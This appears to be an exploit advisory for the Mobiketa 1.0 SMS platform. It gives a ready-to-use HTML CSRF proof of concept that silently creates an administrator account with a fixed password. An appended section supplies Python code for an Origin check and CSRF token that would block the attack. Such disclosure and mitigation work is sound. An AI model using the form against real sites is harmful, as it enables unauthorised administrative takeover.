Mobiketa 1.0 - CSRF Add Admin Exploit
Source: http://twitter.com/muratyilmazlarr Author: Yilmazlar Published: 2016-06-12
<!--
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
# Version: 1.0

# Exploit:

< -- bug code started -- >
-->

<html>
  <body>
    <form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="is_admin" value="1" />
      <input type="hidden" name="name" value="murat y" />
      <input type="hidden" name="email" value="murrat@protonmail.com" />
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="password" value="123123123" />
      <input type="hidden" name="id" value="15" />
      <input type="hidden" name="update" value=" " />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
< -- end of the bug code -- >

#########################

[+] Contact: http://twitter.com/muratyilmazlarr
-->
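
The form above succeeds because the user-update POST carries nothing an outside page cannot supply. As an added example (not code from this advisory or from the vendor), here is a framework-agnostic server-side gate that would reject it: an Origin/Referer check plus a session-bound token. `SERVER_KEY`, `TRUSTED_ORIGIN`, the `csrf_token` field name and the sample requests are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)    # assumption: per-deployment secret
TRUSTED_ORIGIN = "https://sms.example"  # assumption: origin the app is served from


def issue_csrf_token(session_id: str) -> str:
    """Token bound to one session; embedded only in forms the app itself renders."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """True only if Origin (or Referer as fallback) matches the app's own origin."""
    source = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_user_update(session_id: str, headers: dict, form: dict) -> bool:
    """Gate for the state-changing POST: both checks must pass."""
    if not same_origin(headers):
        return False
    expected = issue_csrf_token(session_id).encode()
    supplied = str(form.get("csrf_token", "")).encode()
    return hmac.compare_digest(expected, supplied)  # constant-time comparison


# Constructed sample requests (not captured traffic); fields mirror the form above.
SESSION = "constructed-admin-session-id"
POC_FIELDS = {"is_admin": "1", "username": "murrat", "id": "15", "update": " "}
forged = ({"Origin": "https://attacker.example"}, dict(POC_FIELDS))
genuine = ({"Origin": TRUSTED_ORIGIN},
           {**POC_FIELDS, "csrf_token": issue_csrf_token(SESSION)})

if __name__ == "__main__":
    print("forged :", allow_user_update(SESSION, *forged))
    print("genuine:", allow_user_update(SESSION, *genuine))
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a browser-side layer on top of this check, since the cross-site POST would then arrive without the administrator's session.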